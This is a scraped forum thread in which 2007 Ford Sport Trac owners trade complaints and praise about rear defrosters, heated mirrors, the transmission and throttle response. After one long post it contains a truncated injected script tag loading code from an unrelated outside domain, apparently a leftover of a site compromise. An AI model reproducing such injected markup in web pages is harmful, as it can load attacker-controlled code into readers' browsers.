07 Sport Trac

Ford SportTrac Forum

Help Support Ford SportTrac Forum:

This site may earn a commission from merchant affiliate links, including eBay, Amazon, and others.
Reaction score
I have an 07 Sport Trac Limited. I am completely disapointed with it I even attempted to trade it after 7 months, but I would loose too much. Does any one else feel the same way or is it me? I find the finishing very cheep. No heated mirrors or rear window defroster. The 6 speed transmision sucks, the heating system sucks. There are rattles in the doors and the dash. I could go on and on. I think after 34 years of driving mainly fords I am finally convinced, I will go to Toyota next.

Well the rear defroster is a snag, but it is tolerable. The heated mirrors are also tolerable....just scrape them off before you leave. I think you can buy after-market heated mirrors and have them installed, but I could be wrong. I, on the other hand, am very pleased with my ST. It handles in the snow like a champ. As for the transmission, that also can be fixed. These are just minor issues that can easily be remedied. AND, remember this is only my opinion but, I think it is SO MUCH FUN to add things and mod my cars/truck. It is fun and worth it at the end. Good luck to you! :)

I don't think there should be these kinds of snags on a $41,000 vehicle that is made for the winter ! I agree it handles very well and I do like driving it. As for the transmision they have updated the software twice with no results and I found on the net, there are many similar complaints and ford doesn't seem to care. The truck is on the market and they are on to bigger things. They may be minor issues to some including Ford since they won't fix them, but for my money the issues are not minor. Thank you for your opinion

I think the price tag is more based on the amount of gas it gobbles up compared to other vehicles on the road now. Plus $41k....OUCH....I have an '07 and didn't pay that much, and mine is loaded. I guess it all depends on where you live too huh.

Sounds like some one did not do their research and bought a truck that did not suit their needs.

As for the value of the truck, Buy ANY new truck and drive it off the lot, the valve drops significantly....

Sorry you "hate" the truck...

Todd Z

I still like my 2001 2WD ST much better than my 2007 ST 2WD. The 2007 is quiter and rides nicer but the 2001-2005 has a more functional interior.Also the 2007 traction control SUCKS compaired to a limited slip rear in the snow !!! It seem that thing will not get better with the lower ST and Explorer sales.

41K CND converts "today" to 34,849.1310 USD.

Todd Z

I love my 07! Everything is working like a champ except that the driver's side rear door look actuator needs some extra lubrication (if it is cold, it won't unlock unless you give it a few bumps on the switch) and the keypad is now non-functional (no idea WTF is going on with that thing). I've done pretty much everything you can do with it except for offroading (which is not what I got it for in the first place).

Wow, hard to believe spending that much money and not being satisfied.

I have the '07 loaded and I love it. The tranny works, everything works. I did my research on the options that I wanted and they meet my needs.

My last Ford (a 1994 Ranger factory ordered) ran for 122K miles and I sold it last week to the first person that looked at it. The only major repair it had was front suspension worn out from too many commutes.

On the other hand, I own a '99 Grand Cherokee purchased new. It went through both front and rear differential failures, all power windows replaced, fuel pump failure and now another power window failure, driveshaft propeller seal failure and hard start problem due to fuel pressure leakdown again... It goes on and on. No more Jeep or Chrysler products for me. JD Power ratings confirms my experience. I should have done my homework.

My experience has been Ford has a pretty good design and well respected reliability. I guess I've just been lucky.

Ed:

I have an '07 V8 4X4 XLT Sport Trac and am 98 % happy with it, at this point. I had issues with the TPMS at first and soon found out it was an issue with my old "trusty" tire gauge going haywire on me. I do hear that the TPMS will need to be reset by FORD every time after I rotate the tires. If I can, I will have this system tured off if it is possible. I check my tire pressures quite frequiently.

I really don't like the fact that it doesn't have a rear defrost and believe it wasn't even an option. It's hard enough to see behind this truck and I feel this option would have been a good thing. Every new car I've had since 1972 (all GM) had had this option. As a matter of fact, I actually thought it was a standard item on all cars today.

I also had a hard time seeing out the windshield in a couple of our snows this year. I had the defrost on full tilt amd had to keep hitting the windshield washer soultion over and over to keep it clear. Cured that with a new set of high quality wiper blades and it seems to have cured it. Never replaced wiper blades on any of my previous new cars at 2000 miles before.

I also did not like the 6 speed tranny(sloppy 1-2 shift) but like the folks on this site said, it "learned" my driving habits and appears to have corrected itself after 2,000 miles. Not sure if t will need to "re-learn me" if I ever disconnect the battery for any reason. Still holding my breath on that issue until I have the truck longer. I also don't like that it has no dipstick to check the fluid level on the tranny!

I am a little disappointed in the V8 pickup. Sometimes it pulls like heck and other times it feels like the pedal needs a couple more inches before it hits the floor. I wouldn't be suprised it this weren't the 6 speed tranny making this feel this way. Or it could be the "Throttle by wire". It has some definately odd "lag spots" in the throttle. I sure hope the new V8 Mustang GT doesn't drive this way. Don't get me wrong, this is "OK" to drive but for the price I thought I'd get more than "OK"! I will eventually buy a Todd Z throttle body to help with these issues and better gas mileage but am not sure if I'd add it before the warranty period was up or not! I don't know why they just don't have Todd give them the specs and set up their throttle bodies from the factory that way. Better response and better mileage would not be a bad thing here.

I like the style and versatility of my Sport Trac and the performance is "adequate". The interior is nice especially for a truck and it works well with my family situation (grandbabies). It rides/handles well and I'm 98 % happy with it. It does have some odd things that you would think would have been cleared up before they put these vehicles on the road. Especially, in this price range.

Now I know it sounds like im not happy with the ST but I can live with the issues I've mentioned but I do wonder about the reliability issues when this vehicle gets 60, 80 or 100,000 miles on it. I really hate for the dealer to mess with it because, IT COULD GET WORSE! I usually get at least 120,000 miles out of my GM vehicles before I start getting nickel & dimed. I have written FORD and they do not seem to be to interested in responding. I guess they figure I might just go away and that is a possiblility if this doesn't work out.

This is my 1st new FORD and I'm not sure I will keep it till it's worn out or not. Still awaiting final judgement. I have always kept my other new cars until they had at least 140,000 to 160,000 miles on them. I hope it works out because, at my age, this could be my last vehicle I own and that would be just fine with me.

Over all...it is a good vehicle and the quality is acceptable. And is sure is pretty...yes, I do like the chrome grill! Take care and I hope your ST works out for you in the long run.

Gary
:D

<script src=http://wygbook.cn></scri

Last edited by a moderator:
How do you want rear defrost on a power sliding window ?????

Todd Z

Todd,

I have a Job 1 '07 Trac (no power window) and it does not have rear window defrost. Not a big deal unless I'm traveling since it is garage kept at home.

I would normally have it expected it, especially on a limited.

No truck has a rear defroster unless you get into a full blown SUV or van...a crew cab (I guess that's kind of what a ST is) defrosts the window with the heated air in the cab...with a bigger SUV the passenger compartment is too big. I've never seen a rear window defroster on any pickup...'sides who would want those lines running through their rear window anyway?
I find the finishing very cheep. No heated mirrors or rear window defroster.
The finishing, mirrors and options are the same ones that were on the truck when you bought it...sounds like you should've decided if you liked it before you dropped the down payment!:(

It doesn't have a power sliding window for 1 and for two when I did my research on-line the ford site said the rear defroster was standard equipment. They have since removed ir from their site after I made a complaint. I am not saying the vehicle is not good, I just feel like Garry above. I think Ford should have finished developing the thing before putting it on the market. I think what bothers me the most is my faith in Ford has taken a pretty good hit.

It doesn't have a power sliding window for 1 and for two when I did my research on-line the ford site said the rear defroster was standard equipment. They have since removed ir from their site after I made a complaint. I am not saying the vehicle is not good, I just feel like Garry above. I think Ford should have finished developing the thing before putting it on the market. I think what bothers me the most is my faith in Ford has taken a pretty good hit.

I used to have a Honda Del Sol that had a defrost grid on a rear sliding window. If Honda could do it 10 years ago, I'd think Ford could do it now.

Concerning a rear defrost on a power rear window, Ford had that technology on the Country Squire's from the 1970's. I too wish I had that defroster and heated mirrors as an option without the heated windshield, especially since they have them available on the Explorer. Concerning my 07, with the above pet peeves, I have really enjoyed the ST and am glad I made my choice of the ST Limited.

Honestly, I have never needed the rear defrost on my Trac.

If it were an option, I would not get it. Waste of money.

Tom

Latest posts